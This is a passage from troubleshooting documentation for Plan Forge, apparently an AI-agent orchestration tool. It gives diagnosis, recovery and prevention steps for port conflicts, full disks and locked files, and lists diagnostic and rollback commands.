Diagnosis: a previous Plan Forge process didn't shut down cleanly, or another tool grabbed the port. On Windows: netstat -ano | findstr :3100; on POSIX: lsof -i :3100.
Recovery: kill the stale process by PID. pforge smith detects orphan processes and offers to clean them up.
Prevention: shut down cleanly (Ctrl+C, not kill -9). The orchestrator releases its ports on SIGTERM but not on SIGKILL.
Symptom: writes to .forge/runs/<runId>/trajectory.jsonl or .forge/cost-history.json fail; orchestrator errors with ENOSPC.
Diagnosis: df -h . (POSIX) / Get-PSDrive (Windows). Trajectory files can grow large for long runs.
Recovery: clear old runs. .forge/runs/ can be pruned aggressively; keep only recent traces. Cost history is small (JSONL one row per LLM call).
Prevention: configure .forge.json#execution.trajectoryRetentionDays (default 30) to a value your disk tolerates.
Symptom: write fails with EBUSY or EPERM; common when an editor, antivirus, or sync client (OneDrive / Dropbox) is holding the file.
Diagnosis: Get-Process | Where { $_.Modules.FileName -contains $path } in pwsh; or use Process Explorer's "Find Handle" feature.
Recovery: close the editor / sync client; the orchestrator's retry loop usually picks up the file on the next attempt. For persistent locks, exclude .forge/ from sync-client scope and antivirus realtime scanning.
Prevention: put working repos outside synced folders when possible; add .forge/ to OneDrive / Dropbox exclusion lists.
When in doubt, the following are safe in any failure mode:
- pforge smith: environment diagnostic; reports installed CLIs, configured providers, port status, disk space.
- /health-check skill: forge_smith → forge_validate → forge_sweep in sequence.
- forge_diagnose: per-run diagnosis with structured remediation suggestions.
- pforge run-plan --resume-from <slice>: resumes a failed run at a specific slice, preserving prior committed slices.
- git reflog + git reset --hard: ultimate rollback to any prior orchestrator commit.
- forge_meta_bug_file: if you worked around a Plan Forge defect, file it so the fix lands upstream. See self-repair reporting.
scope-violation, gate-timeout, etc.).